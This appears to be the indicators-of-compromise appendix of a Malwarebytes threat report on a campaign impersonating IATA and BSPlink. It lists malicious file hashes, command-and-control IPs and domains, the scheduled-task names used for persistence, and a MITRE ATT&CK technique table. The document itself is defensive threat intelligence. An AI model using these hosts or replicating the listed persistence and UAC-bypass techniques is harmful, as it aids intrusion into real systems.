|47ba49ace38b677b82e264821274cfb0c531438b4449a2ee8a86f1488a0ec094|BSPlinkUpdaterV4.exe| |b0c171a7bf59face4a906dbaebb0a42c4bdcad79e23c93eaa11c0ff9f9e1b63e|IATA ONE ID.exe| |91573e2aad89c56aafd30ee2dd1155ef1e2b38a2d2856a3201e1f600e6685217|| |3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787|Qykk.exe| |acbe0d54176227f28b98caaf141c82cc51e43a7b5797c1d3c76b01123e3f8f48|Qyk.exe| |3a5480d5ea288089567f338055545b05c195f8eaf350ec4698ca6cb03b91f787|Qykk.exe| |6d686b68de83cbadf89708c07251bf79180ade724e4a55c481533591a418885f|Qyk.exe| |3e06419b294d31b00627ab9bd911b8b28f530fd24082ddc4c8395c026e3977c2|BSPlink Upgrade.zip| |7bc29edcbb6ab7fae89b87a34919f94988a114d522b066b0dcc223d69dbe0d57|BSPlink Upgrade.exe| |d9c29e1d6655e82c63fb393e70b74832e4ef9f51d4cf1eb4ced610147e8739ba|1.exe| |76de9f8d6f0fcf8c5fb2bafc387c363e138af15cf751d2c2a230ad9cafd6271c|Setu-rms.exe| |084a9940f85047be896b1bb1769bd667cef30d15920d61bfc0728d8d87b839df|Ve.exe| |7adfb53ec021010a6921ac70f006c588d25278591ebc7a141a97db8e8ce10e2c|AdobeSD.exe| ----- |e351840760e757bcc6b26efdd13abb393f3595f9ee1dad6de7e4ac6016569ee1|IATA_Security.zip| |---|---| |d0a92eca3053e644b8f40be86a62ecfabaf13c7681eb6a3fbf35c562561bf756|SUPPORT_KIT_USER.zip| |540bcc8dde27c9f2e29b4478f7ee836eac14da37a26db4591d3031048e3949c3|SUPPORT__KITS_USERS.zip| |9c78b1aa211ffc44fc476fe62c5ebb58f6b996f5fe34412e7a63da577ebb52ca|SUPPORT_KIT_USERS.zip| |2f92fb448dec9a56201f7381c8103a5c5e1f9d539a52df81357b1c285a4be6bb|SUPPORT_KITS__USERS.zip| |69ea7e22f714593a2c2283dc9dc688cccfe1904f40c234263617902a0c0cb538|IATASecurity.zip| |56719d9276dba013668ff0ae2313e19dcf2daa4c41f623acdeb1d5190f161b59|zim.bat| |8f21b526c64e6ed7dc949fd99302e3e003bd3f244471eb385413b7c5a3b9ebd3|hidden.bat| |2804964569aaffaf982f244002029985cdddfba2e904c35bc5410430083313ed|hpjs.ps1| |f2a9d337ed894f2b3ba528abf6ec8b104852032b8ad1aacfd4057a1484b3f657|ngr2.ps1| |67887f90cfddd35aff1d439a466d9175affd468a93c08c2a3b6f2fbc6bf41e21|ngr3.ps1| |6b7c93cf1e392025652e528deb6e19a98077b5571eb0ed96f687a2101693cad4|ngr.ps1| |d195e3b83e13a09d4d3f7b883123cbd273a8e43fdfb73a44797f413a3c1dc932|OChpjs.ps1| |39bafd701738224cfbf210b825d8b1700de390492f0281c2ea62bd8153d04101|Ohpjs.ps1| |e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855|SUPPORT_KITS_USERS.pdf.b at| |ba79fa5e4a294ca77fc7707901be60bddbc8fbe12d3c4b97b0361b9b33c5df25|ua.bat| |7ae7eba2b69228f3a0b01a59dfc6868d14bab73350fc954e559f5092e6429068|xt.ps1| |5831d481f59a19416a9a081cd05db145f20d9ce47111fd6a6d6d0c1897691394|kaz.bat| |f1ba1a13ce24383f06d76239f0c20eb20031ab638a146418d20c6c5f0313e85e|lnk.bat| |d11fa64725812816dc7d40dc2b4ff587d7c2c3642b4644eceaf7d5d45dc4a572|mstsc.bat| |e8e1af3431f3c68376cbd507bf8b4f7a5c0d88ce9ba92408e8fffba8f68cacc2|Recruitment Notice.pdf| **Others:** ----- dfd64e1ef1c5f78a9ffaf9484ad944428a42c506d4bdd4abd06c36af1286f830 486c32527778d03a182ea138b120e65894c2a56694475d46cdaf8096c8315ef2 a24478f2e4a427a3d51eee59494fcafc134a2f7438df6048bac78d7e03195e82 511fc2844f83b2db6dfa001fa807a481e307971a59cfc834fb05f91bcac7d1f7 5ded50f61bf34d7c99b9c80eb35aa0e99a38ab2fab43b98091fd7d51073ac598 221fe1c74b54724a51c15b442b1ab41dad11ce8504292881cc835c058c99f505 6c3b5ebd3e97986fbba855f042ad9be8729b960961491462bbec48ce67d7d9f9 df4bc0d07bc6c384a0bf015959ea86cc7fd26853cd74f106e1e1711eb8d33bac 7c34b2290b9ef2ccb4fef71f1f657e8f4c5f71f1bcd58de1128abb79c8839e7c 9bfa0256d2278b0d57e87bf62c45201e4796f873fbab881e57bc1d5b42d9eb54 f30e13a050375097f42f290b218306d31f67017cceb5bb2f126033b6646a25a5 563e2ba027e19da0880ef46a9db7a88a7f3f166ae545aa1d09c6372a4ace36fb 132664a7a25a029660a6295fb934799353dae5ab7bb5d39a419c8a15dd731b87 1cf356e4c59a8cce27d5defffcb4eb66140a162d539cbe4864e0b0c0eb9c9079 576eb01b09d8a2d7e8b8bb65bd23c237f80e70bb89ff03636574442c8414b271 33a5a796d49bfaee95a8d869c186850dc937e3e8801f409cb09d74fce7786f8f d9c29e1d6655e82c63fb393e70b74832e4ef9f51d4cf1eb4ced610147e8739ba ae8fa9b59fb15269e27cbbff6ad480cb53699eb56ff7bb36bcfd1b952a183e17 fb9064cd8b791f3057907e0d2d7393e0188b346e1a52e38d234ff295086e6d71 084a9940f85047be896b1bb1769bd667cef30d15920d61bfc0728d8d87b839df 528a8493f9046d630a0dad91d445481da8657b98f9151c55e5ab95e529d21018 cfbe2386ba456ec54ccb62d022906a782be2aec7c93b92d02dd5c74b62131585 50f600945cffb217dfec30e38cdd145f31f0a424ebb119c58072ab53afdea055 2775051020c869599208ae42eb5946b0977253d28298acb18061e51575adad1f cf48e8da9746c021438759740cae0a4aaffb2ed47ca0e6c738b58c3af9a48de0 **Network indicators:** 185.186.247.114 kasperskylab.ignorelist.com hpsj.firewall-gateway.net googlechromeupdater.twilightparadox.com 157.245.243.62 216.189.145.11 iatassl-telechargementsecurity.duckdns.org **Scheduled Task Names:** WindowsVer WinDowsUpdates WindowsUpdatesU automaticChromeUpdater AutomaticU AutomaticAppUpdaterAU AutomaticMozila ----- ## MITRE ATT&CK techniques **Tactic** **Id** **Name** **Details** Initial access T1566.001 Spear phishing attachment T1566.002 Spear phishing link Execution T1204.001 Malicious links Manual execution by user T1204.002 Malicious files Manual execution by user T1059.003 Windows command shell Starts CMD.EXE for commands execution T1106 Native API T1059.001 PowerShell Executes PowerShell scripts Loads the Task Scheduler DLL interface T1053.005 Scheduled Task Uses Task Scheduler to run other applications T1047 Windows Management Instrumentation powershell.exe executed via WMI Persistence T1546.001 Change Default File Association reg.exe Changes default file association T1546.012 Image File Execution Options Injection svchost.exe Changes Image File Execution Options Creates or modifies windows services T1543.003 Windows Services Modifies Windows Defender service settings T1547.001 Registry Run Keys / Startup Folder Changes the autorun value in the registry Loads the Task Scheduler DLL interface T1053.005 Scheduled Task Uses Task Scheduler to run other applications T1547.004 Win Logon Helper DLL Changes the login/logoff helper path in the registry Privilege T1548.002 Bypass User Account Control Uses fodhelper and event viewer to bypass UAC Escalation T1546.012 Image File Execution Options Injection Changes Image File Execution Options Defense Evasion T1562.001 Disable or Modify Tools Modifies Windows Defender service settings Windows File and Directory Permissions T1222.001 Uses ATTRIB.EXE to modify file attributes Modification T1112 Modify Registry Uses REG.EXE to modify Windows registry T1218.005 Mshta Starts MSHTA.EXE for opening HTA or HTMLS files T1218.011 rundll Uses RUNDLL32.EXE to load library T1548.002 Bypass User Account Control Uses fodhelper and event viewer to bypass UAC T1140 Deobfuscate/Decode Files or Information Decodes Base64 and decrypts AES encrypted traffic Uses AES encryption T1027 Obfuscated Files or Information Uses obfuscation tools Uses Base64 encoding Discovery T1057 Process Discovery Obtains list of running processes ----- T1082 System Information Discovery T1016 System Network Configuration Discovery T1033 System Owner/User Discovery T1124 System Time Discovery C&C T1071.001 Web protocols T1132.001 Standard Encoding Use Base64 to encode the data T1001 Data obfuscation Use AES encryption to encrypt the data T1104 Multi-Stage Channels Exfiltration T1041 Exfiltration Over C2 Channel ----- Malwarebytes Inc. 3979 Freedom Circle, 12th Floor ###### Santa Clara, CA 95054 USA +1 800 520 2796 © 2021 Malwarebytes. All Rights Reserved. Any brand name is the property of its respective owner, is used for identification purposes only, and does not imply product endorsement or affiliation with Malwarebytes. -----